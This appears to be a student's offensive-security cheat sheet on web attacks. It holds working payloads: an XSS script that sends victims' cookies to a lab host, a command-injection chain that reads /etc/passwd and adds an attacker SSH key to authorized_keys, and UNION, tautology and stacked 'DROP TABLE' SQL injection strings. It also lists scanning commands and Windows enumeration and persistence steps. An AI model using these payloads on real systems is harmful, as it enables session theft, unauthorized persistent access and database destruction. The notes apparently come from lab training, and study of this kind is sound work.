wget -r -l2 -P /tmp ftp://ftpserver/
wget --save-cookies cookies.txt --keep-session-cookies --post-data 'user=1&password=2' https://website
wget --load-cookies cookies.txt -p https://website/interesting/article.php
- More Scripts
- JavaScript
allow websites to interact with the client
JavaScript runs on the client's machine
- ROBOTS.TXT
provides webcrawler a list of directories
nmap -v -sT -T5 --script http-enum.nse <target ips>
nmap -v -sT -T5 --script http-robots.txt.nse <target ips>
nmap -Pn -T5 -sT --script http-sql-injection.nse <IP>
*** niko -h <target ip> ***
- Reflected
client side
Transient, occurs in error messages or search results
URLs can be Base64 encoded - Stored
Resides on the vulnerable site
Only reqires user to visit
# this will steal cookies from a message board
<script>document.location="http://10.50.20.97/Cookie_Stealer1.php?username=" + document.cookie;</script>
The ablity to traversal thourgh Directory
Use reltive paths ../../../
- the ablity to run commands on a server
# The ';' semicollon allows you to inject commands
; cat /etc/passwd
# method to add a ssh public key to http server
ssh-keygen -t rsa # local side
cat ~/.ssh/id_rsa.pub # copy the full text
# command injection
; whoami # the user the webserver is login as
; cat /etc/passwd # to find the home directory
; ls -la <home dirctory> # check to see if the directory is created
; mkdir /home/dir # if the webserver user hasn't loged oun.
; echo "<public key> student@lin-op" >> /home/dir/.ssh/authorized_keys # add a new authorized_key
; cat /home/dir/.ssh/authorized_keys # check
when a server allows you to upload a file without validation.
you can find a upload a .php that give you a shell.
Then you can use the shell to do a command injection.
a standed database management language
SQL Commmands
SHOW databases;
SHOW TABLES FROM session;
SELECT * FROM session.car;
USE session;
SHOW Tables;
DESCRIBE car;
SELECT * FROM car;
SELECT * FROM car UNION SELECT tireid,name,size,cost,1,2 FROM Tires;
- SQL Injection
uses a valid query from the client sided - Unsanitized Fields
the input field is vernable to basic SQL enjection
Found using a single quote ` - Sanitized Fields
the input field are checked to prevent harm to the database
# Truth Statement
USE session;
SELECT id FROM user WHERE name='tom' OR 1=1;
# This works because the OR clause 1=1 is true, so the database will return all entries housed in id field
# Stacking Statement
# Chaing multiple statements togeter using a semi-colon
# some servers do not allow Stacking statements
SELECT * FROM user WHERE id=‘Johnny'; DROP TABLE Customers; --’
# Nesting statements
<INITIAL QUERY> UNION SELECT 1,2,name FROM user; -- This is the Nested Statement added to the below Query
SELECT carid, name, (SELECT SUM(cost) FROM Tires WHERE name = "goodyear") FROM car WHERE name = "ford" UNION SELECT 1,2,name
# comments abuse
# use a comment like # or -- to within a query to ignore serverside arguments
# Input to Inject:
1 or 1=1; #
#Server-Side Query becomes:
SELECT product FROM item WHERE id = 1 or 1=1; # limit 1;
# Blind SQL injection:
# Occurs when an attacker sends TRUE/FALSE statements to determine how the database is configured.
<URL>/uniondemo.php?Selection=2 Union SELECT 1,2 <!-- GET METHOD, enter in the URL -->
Audi' UNION SELECT 1,2,3,4 # <!-- POST METHOD, enter in the Input Field -->
Abuse The Client (GET METHOD)
Passing injection through the URL:
After the .php?item=4 pass your UNION statement
prices.php?item=4 UNION SELECT 1,2
prices.php?item=4 UNION SELECT 1,2,@@version
# @@version will return the host information for the SQL server.
### GET Method ###
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1; -- FUZZED PAGES
<URL>/placeholder.php?<DataBase>=<1.2.3.....> UNION SELECT table_schema,column_name,table_name FROM information_schema.columns -- Golden statems
<URL>/placeholder.php?<DataBase>=<1.2.3.....> or 1=1;
### POST Method ###
tom' OR 1=1 #
press F12
copy raw sql from post
xfreerdp -windows box with port 3389
net group
net users
whoami
net localgroup
### gui ###
reg edit
run
runonce
services
sch tasks